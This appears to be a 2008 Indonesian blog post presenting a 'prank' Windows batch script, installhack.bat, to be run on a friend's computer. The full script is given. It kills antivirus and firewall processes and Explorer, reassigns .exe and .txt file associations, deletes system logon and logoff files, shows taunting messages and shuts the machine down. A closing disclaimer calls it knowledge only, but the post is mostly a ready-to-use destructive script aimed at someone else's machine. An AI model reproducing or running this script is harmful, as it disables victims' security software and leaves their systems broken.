Minggu, 28 September 2008

Kerjai Komputer temen seolah-olah telah di Hack

Copy link dibawah ini pada Notepad, Save dengan nama installhack.bat, file batch ini akan melakukan :

1. End Process, NAVAPSVC.exe
2. End Process, Explorer.exe (taskbar and icons akan hilang)
3. End Process, zonelabs.exe
4. associate file exe ke file txt (ketika membuka file aplikasi, mak yang terbuka adalah file notepad)
5. associate file txt ke file mp3 (ketika membuka file txt maka yang terbuka adalah WinAmp atau WMP)
6. menghapus Login/Logoff Screens

Berikut scriptnya:

title Hack Setup
color 0A
@echo off
set end=md “Hack installing”
set fin=copy “Hack log.txt” “Installing”
%end%
%fin%
net send * Hack is installing, press OK to begin set up.
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
cls
msg * It is you who is hacked….
msg * I warned you, and you kept going. Challenge me and this is what happens.
DEL C:\WINDOWS\system32\logoff.exe /F /Q
DEL C:\WINDOWS\system32\logon.exe /F /Q
DEL C:\WINDOWS\system32\logon.scr /F /Q
cls
shutdown

**************************************************************

Jangan mencoba pada Komputer anda sendiri
Ini adalah sebagai pengetahuan saja, saya tidak bertanggung jawab jika anda mencobanya

Template by - Abdul Munir | Daya Earth Blogger Template